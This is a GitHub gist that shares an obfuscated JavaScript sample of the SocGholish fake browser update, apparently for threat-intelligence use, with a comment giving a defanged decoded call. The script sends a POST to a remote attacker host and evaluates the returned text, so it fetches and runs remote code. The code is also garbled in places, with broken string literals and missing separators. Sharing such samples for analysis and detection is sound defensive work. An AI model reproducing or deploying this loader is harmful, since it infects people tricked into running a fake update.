Created
August 9, 2022 09:45
-
-
Save BushidoUK/cc118e8ed3f634315e186c12e007ee76 to your computer and use it in GitHub Desktop.
SocGholish JavaScript Fake Browser Update
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function(_0x25cba2, _0x45eb40) { | |
| var a0_0x501b44 = { | |
| _0x17e23d: 0x38, | |
| _0x205270: 'CuXi', | |
| _0x4af451: 0x55, | |
| _0x3d4924: 0x44, | |
| _0x2c4ea4: 0x28, | |
| _0x561b2d: 'Sg20', | |
| _0x5656b1: 0x37, | |
| _0x3c1bf0: 'Urg4', | |
| _0x2135a2: 0x59, | |
| _0x113132: 0x6a, | |
| _0x4bbb1c: 0x66, | |
| _0x4a2f10: 'wIFp', | |
| _0x339d18: 0x48, | |
| _0x571b04: '6QTJ', | |
| _0x15cc3a: 0x52, | |
| _0x30476c: 0x23, | |
| _0x2736d5: 0x20, | |
| _0x493776: 0xfc, | |
| _0x315ca6: 0xeb, | |
| _0x176bed: 'QWQw' | |
| }, | |
| a0_0x54c8c8 = { | |
| _0x2bead9: 0x1a3 | |
| }, | |
| a0_0x24510b = { | |
| _0xba6870: 0x374 | |
| } | |
| function _0x291671(_0xe0add2, _0x377cfd, _0x32ff64, _0x2d3d51, _0x2fa3f8) { | |
| return a0_0x5076(_0xe0add2 - -0x150, _0x2d3d51) | |
| } | |
| function _0x759462(_0x51bef4, _0x1cf7ed, _0x56552b, _0x5bd1fa, _0x4f9b6d) { | |
| return a0_0x5076(_0x51bef4 - a0_0x24510b._0xba6870, _0x56552b) | |
| } | |
| var _0x1a42c4 = _0x25cba2() | |
| function _0xae1aaf(_0x1e6e84, _0x273c01, _0x510111, _0x5f2793, _0x575cbc) { | |
| return a0_0x5076(_0x575cbc - -0x77, _0x5f2793) | |
| } | |
| function _0xe7850f(_0x258142, _0x504bec, _0x72c0a7, _0x5256a5, _0x2c34f4) { | |
| return a0_0x5076(_0x258142 - -0x6c, _0x5256a5) | |
| } | |
| function _0x15bb8f(_0x4f0470, _0x216a88, _0x1e8b9d, _0x7aff2b, _0x32b5de) { | |
| return a0_0x5076(_0x32b5de - -a0_0x54c8c8._0x2bead9, _0x4f0470) | |
| } | |
| while ( | |
| []) { | |
| try { | |
| var _0x105fd7 = -parseInt(_0xe7850f(0x4d, a0_0x501b44._0x17e23d, 0x3d, a0_0x501b44._0x205270, a0_0x501b44._0x4af451)) / (0x1 * 0x713 + -0x26 * -0xa7 + -0x1 * 0x1fdc) + -parseInt(_0xae1aaf(a0_0x501b44._0x3d4924, 0x47, a0_0x501b44._0x2c4ea4, a0_0x501b44._0x561b2d, 0x30)) / (0x1711 + 0x99 * 0x5 + -0x1a0c) + -parseInt(_0xe7850f(a0_0x501b44._0x5656b1, 0x26, 0x4c, a0_0x501b44._0x3c1bf0, 0x37)) / (0x1 * 0x1c4 + 0x52c + -0x6ed) + parseInt(_0xe7850f(a0_0x501b44._0x2135a2, a0_0x501b44._0x113132, a0_0x501b44._0x4bbb1c, a0_0x501b44._0x4a2f10, 0x5e)) / (-0x326 * -0x8 + 0x912 + -0x12 * 0x1e7) + parseInt(_0xae1aaf(0x61, a0_0x501b44._0x339d18, 0x50, a0_0x501b44._0x571b04, a0_0x501b44._0x15cc3a)) / (0x1174 * 0x1 + -0x18f3 + 0x784) + parseInt(_0xae1aaf(0x45, a0_0x501b44._0x30476c, a0_0x501b44._0x2736d5, ' | |
| Dz * ',0x38))/(-0x2677+-0x2680+0x4cfd)*(-parseInt(_0x15bb8f(' | |
| x14R ',-0x102,-0xf8,-a0_0x501b44._0x493776,-a0_0x501b44._0x315ca6))/(0x1*0x39e+-0x1540+0x3*0x5e3))+parseInt(_0xae1aaf(0x35,0x1a,0x20,a0_0x501b44._0x176bed,0x2e))/(0x8bf*-0x1+0x134f*0x1+-0xa88) | |
| if (_0x105fd7 === _0x45eb40) break | |
| else _0x1a42c4['push'](_0x1a42c4['shift']()) | |
| } | |
| catch (_0x5280f4) { | |
| _0x1a42c4['push'](_0x1a42c4['shift']()) | |
| } | |
| } | |
| }(a0_0x477d, -0x157a74 * -0x1 + -0x5df * 0x80 + -0x66cd2)) | |
| function a0_0x5076(_0x30474c, _0x2f72a8) { | |
| var _0x1d2572 = a0_0x477d() | |
| return a0_0x5076 = function(_0x18eacf, _0x4ca7ab) { | |
| _0x18eacf = _0x18eacf - (0xa0 * -0x13 + 0x8 * -0x1 + 0x1 * 0xc87) | |
| var _0x3ecff9 = _0x1d2572[_0x18eacf] | |
| if (a0_0x5076['AFxqLg'] === undefined) { | |
| var _0x186210 = function(_0x325519) { | |
| var _0x3f6261 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=' | |
| var _0x5d0a7e = '', | |
| _0x4148ed = '' | |
| for (var _0x3ca0d3 = -0x573 * -0x1 + -0x1f2e + 0x19bb, _0x54d893, _0x37b8aa, _0x82583 = 0x12a3 + 0x171f + -0x29c2 | |
| _0x37b8aa = _0x325519['charAt'](_0x82583++) _0x37b8aa(_0x54d893 = _0x3ca0d3 % (-0x264b + 0x1 * -0x1871 + 0x3ec0) _0x54d893 * (-0x17d * -0x9 + 0x952 + 0x1 * -0x1677) + _0x37b8aa: _0x37b8aa, _0x3ca0d3++ % (-0x11e7 + 0xa69 + 0x782)) _0x5d0a7e += String['fromCharCode'](-0x2199 + 0x188b + -0x1f * -0x53 _0x54d893 >> (-(-0x5 * -0x2 + -0x636 + 0x62e) * _0x3ca0d3 0x25 * -0x67 + 0x7c4 + 0x725)): -0x109a + 0x238c + -0xa * 0x1e5) { | |
| _0x37b8aa = _0x3f6261['indexOf'](_0x37b8aa) | |
| } | |
| for (var _0x45fb1d = 0x1 * 0x224f + 0x2 * 0x546 + -0x2cdb * 0x1, _0x59e394 = _0x5d0a7e['length'] | |
| _0x45fb1d < _0x59e394 _0x45fb1d++) { | |
| _0x4148ed += '%' + ('00' + _0x5d0a7e['charCodeAt'](_0x45fb1d)['toString'](0x26c8 + -0x2196 + 0x92 * -0x9))['slice'](-(-0x22 * -0xee + -0x3 * -0x2a8 + 0x1 * -0x2792)) | |
| } | |
| return decodeURIComponent(_0x4148ed) | |
| var _0x38979f = function(_0x5d7d9e, _0x45b6bd) { | |
| var _0x145ad7 = [], | |
| _0x5401e9 = -0x1 * 0xb4f + 0x1 * 0x20b + 0x1 * 0x944, | |
| _0x2cb681, _0x26f932 = '' | |
| _0x5d7d9e = _0x186210(_0x5d7d9e) | |
| var _0x56bdc2 | |
| for (_0x56bdc2 = 0x1 * -0x23b1 + -0x132 * 0x8 + 0x2d41 _0x56bdc2 < -0x41b * -0x9 + 0x1115 * -0x1 + -0x12de _0x56bdc2++) { | |
| _0x145ad7[_0x56bdc2] = _0x56bdc2 | |
| } | |
| for (_0x56bdc2 = -0x1919 + -0x2677 + 0x3f90 _0x56bdc2 < -0x392 + 0x1 * 0x39e + 0xf4 _0x56bdc2++) { | |
| _0x5401e9 = (_0x5401e9 + _0x145ad7[_0x56bdc2] + _0x45b6bd['charCodeAt'](_0x56bdc2 % _0x45b6bd['length'])) % (0x2669 + 0x1 * 0x650 + 0x7 * -0x63f), _0x2cb681 = _0x145ad7[_0x56bdc2], _0x145ad7[_0x56bdc2] = _0x145ad7[_0x5401e9], _0x145ad7[_0x5401e9] = _0x2cb681 | |
| } | |
| _0x56bdc2 = -0x1 * -0x1de4 + -0x2cd * 0x1 + -0x16d * 0x13, _0x5401e9 = -0x55 * 0x67 + -0x81b + -0x3 * -0xe1a | |
| for (var _0x3a096b = 0x1e90 + -0x29 * 0x25 + 0x385 * -0x7 | |
| _0x3a096b < _0x5d7d9e['length'] _0x3a096b++) { | |
| _0x56bdc2 = (_0x56bdc2 + (0x2 * -0xb9b + -0x45b + 0xdc9 * 0x2)) % (-0x3f5 * 0x3 + -0x2123 + -0xf56 * -0x3), _0x5401e9 = (_0x5401e9 + _0x145ad7[_0x56bdc2]) % (0x15e9 + 0x2609 + -0x3af2), _0x2cb681 = _0x145ad7[_0x56bdc2], _0x145ad7[_0x56bdc2] = _0x145ad7[_0x5401e9], _0x145ad7[_0x5401e9] = _0x2cb681, _0x26f932 += String['fromCharCode'](_0x5d7d9e['charCodeAt'](_0x3a096b) _0x145ad7[(_0x145ad7[_0x56bdc2] + _0x145ad7[_0x5401e9]) % (0x5 * 0x4ab + -0x135b + -0x2fc)]) | |
| } | |
| return _0x26f932 | |
| a0_0x5076['kohosd'] = _0x38979f, _0x30474c = arguments, a0_0x5076['AFxqLg'] = | |
| } | |
| var _0x5ecdca = _0x1d2572[-0x1f3 * -0xd + -0x1 * -0x87 + -0x19de], | |
| _0x5162bc = _0x18eacf + _0x5ecdca, | |
| _0x51b903 = _0x30474c[_0x5162bc] | |
| return | |
| _0x51b903 | |
| (a0_0x5076['yiisQO'] === undefined(a0_0x5076['yiisQO'] = []), _0x3ecff9 = a0_0x5076['kohosd'](_0x3ecff9, _0x4ca7ab), _0x30474c[_0x5162bc] = _0x3ecff9): _0x3ecff9 = _0x51b903, _0x3ecff9 | |
| }, | |
| a0_0x5076(_0x30474c, _0x2f72a8) | |
| } | |
| var ___that___ = this, | |
| ___xmlhttp___ = new ___that___[(a0_0x4ad211(-0x45, 'vIG]', -0x55, -0x4b, -0x40)) + (a0_0x4ad211(-0x29, 'xn[D', -0x37, -0x42, -0x39)) + (a0_0x5bb573(0xd2, 0xd5, 0xc0, 0xe5, 'hFM$'))](a0_0x4ad211(-0x27, 'BF2a', -0x36, -0x3f, -0x2f) + a0_0xd93e52(0x1d3, 0x1e2, 0x1db, ' | |
| SHq ',0x1cb)+a0_0x4ad211(-0x38,' | |
| d * h * ',-0x45,-0x27,-0x37)) | |
| ___xmlhttp___[a0_0x5bb573(0xee, 0xf0, 0xf5, 0x101, '*AEW')](a0_0x51ace9(-0x344, -0x338, -0x334, -0x31e, '%T | |
| G '),a0_0x4ad211(-0x31,' | |
| @ @Zx ',-0x28,-0x32,-0x32)+a0_0xd93e52(0x1a9,0x1a5,0x1af,' | |
| @ @t ',0x1b6)+a0_0x51ace9(-0x329,-0x32a,-0x329,-0x330,' | |
| ow @l ')+a0_0xd93e52(0x1c0,0x1d5,0x1d1,' | |
| @YAL ',0x1d8)+a0_0x4ad211(-0x34,' | |
| ahj7 ',-0x35,-0x19,-0x2b)+a0_0x5bb573(0xc6,0xd8,0xed,0xe2,' [U7O ')+a0_0x51ace9(-0x31a,-0x319,-0x331,-0x346,' | |
| xISR ')+a0_0xd93e52(0x1a0,0x1b3,0x1ac,' | |
| @ @Zx ',0x1ab)+a0_0x5bb573(0xd0,0xcf,0xd8,0xdd,' | |
| q[')+a0_0xd93e52(0x1b8,0x1bd,0x1b4,' | |
| ow @l ',0x1a9)+a0_0x5bb573(0xf6,0xf5,0xf5,0xf9,' | |
| wf)) | |
| ')+a0_0x5bb573(0xd0,0xdb,0xc7,0xc6,' | |
| xn[D '),function a0_0xd93e52(_0x4a447d, _0x4f4da1, _0x2e9897, _0x4d197b, _0x1cda4c) { | |
| var a0_0x2bb0e9 = { | |
| _0x2eaacd: 0x10a | |
| } | |
| return a0_0x5076(_0x1cda4c - a0_0x2bb0e9._0x2eaacd, _0x4d197b) | |
| } | |
| function a0_0x51ace9(_0x185e66, _0x84511a, _0x35305f, _0x36ccbc, _0x200363) { | |
| return a0_0x5076(_0x35305f - -0x3e6, _0x200363) | |
| } | |
| function a0_0x4ad211(_0x29833c, _0x24e70e, _0x376669, _0x4f50a6, _0xd9454a) { | |
| var a0_0x3c5d07 = { | |
| _0x4435cb: 0xed | |
| } | |
| return a0_0x5076(_0xd9454a - -a0_0x3c5d07._0x4435cb, _0x24e70e) | |
| } | |
| function a0_0x493537(_0x34dfee, _0x1a0a91, _0x27bab5, _0x10a0de, _0x58379e) { | |
| return a0_0x5076(_0x27bab5 - 0x162, _0x10a0de) | |
| } | |
| function a0_0x5bb573(_0xd3e84, _0x54fdd2, _0x5be554, _0x4ae9f1, _0x1e93d4) { | |
| var a0_0x1afc74 = { | |
| _0x259f63: 0x2d | |
| } | |
| return a0_0x5076(_0x54fdd2 - a0_0x1afc74._0x259f63, _0x1e93d4) | |
| } | |
| function a0_0x477d() { | |
| var _0x159f23 = ['WQtdHCkYWPu', 'W6pdVYldNq', 'smoCWOxcSsfJySoNW6unW4xdQ2i', 'D8ouW41Vi0VcKSoGfxhcIw7dJa', 'uvhcJxiFu8opWQxcQmkPBSoPW6y', 'WPNcSKWSda', 'DuVdN2BcMM1u', 'WRHhjmoFW6u', 'WQqYlSkvW6q', 'WObWsmkgWQNcMh1krmklW5H/W7u', 'AedcSLtcKG', 'WPpcKeFcRCkQ', 'WR0hsCoTWOu', 'A3pdKfu', 'W5BcJcRcQSkY', 'WQvKWPpcKcTpiCkAWPVcN3SVsq', 'm0ldJN3cHG', 'kSkPWPBdPCk+', 'E8kHWOFdG8kW', 'DXpcTYxdHWqxCIP2WPpdGga', 'D8oxW4LTi0VdP8ogfvhcI30', 'cmk6WParEW', 'WOLfEIxdPdb+fCkAW7i7WQNdGIy', 'W5dcGSoAWPNdKCkzW6FdUulcSYdcO8kp', 'A0z+tZu', 'r23cNCosW4m', 'WQ4oBSokW7q', 'E8kfWOpdNa', 'WOlcTL0Uda', 'xmoJkmkJW5S', 'WQL3umkCW5ldHuvIwdCTi8oi', 'r8oQDs3cLq', 'W6hcJwrQmSkwWQSSWRBdVSo6WOtdPmk/', 'W5xcVX/cO8kp', 'cK9Evc3cHr7dSSo2vmopWRq', 'W7OQtW', 'fmkRoaJdJmoKWRhcL0aLjX1g', 'WPRcN0aioG', 'orDGog4', 'hCk0ja3dHG', 'C3ZdKxfI', 'W7yBeZ0', 'WQVdVZVdNetcT8ku', 'vmo+zv0', 'WOVcJmkYW5VdTq', 'WRldVmk+W7q', 'kvefW75rvCoNzcpcHSkSWRZcUa', 'W6yXpZOz', 'ySkFvmkCWPe'] | |
| a0_0x477d = function() { | |
| return _0x159f23 | |
| return a0_0x477d() | |
| } | |
| ___xmlhttp___[a0_0x4ad211(-0x2f, '@@t | |
| ',-0x4f,-0x2d,-0x3d)](a0_0x493537(0x218,0x218,0x229,' | |
| wf)) | |
| ',0x23f)+a0_0xd93e52(0x1bd,0x1cc,0x1cc,' | |
| 6 QTJ ',0x1ca)+a0_0x5bb573(0xc8,0xd7,0xe2,0xc1,' | |
| zLX5 ')+a0_0x5bb573(0x100,0xfc,0x107,0x112,' | |
| 2 @kY ')+a0_0x4ad211(-0x27,' | |
| ooyY ',-0x2a,-0x25,-0x29)+a0_0x4ad211(-0x27,' | |
| 6 QTJ ',-0x3d,-0x1d,-0x27)+a0_0x493537(0x1fe,0x21b,0x213,' * 4 cU ',0x228)+a0_0x493537(0x210,0x1fe,0x208,' | |
| ooyY ',0x1ff)+a0_0x51ace9(-0x332,-0x33b,-0x32f,-0x33a,' | |
| SHq ')),___that___[a0_0x5bb573(0xd2,0xcd,0xde,0xbe,' | |
| wf)) | |
| ')](___xmlhttp___[a0_0x5bb573(0xef,0xf8,0xf7,0xf1,' | |
| ZbMz ')+a0_0x4ad211(-0x5e,' | |
| n8y3 ',-0x37,-0x49,-0x49)+' | |
| xt ']) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
SocGholish decoded:
ScriptContent: IServerXMLHTTPRequest2.open("POST", "hxxps://*[.]telegram[.]godsmightywhispers[.]com/updateResource"", "false");
IServerXMLHTTPRequest2.send("redacted encoded string");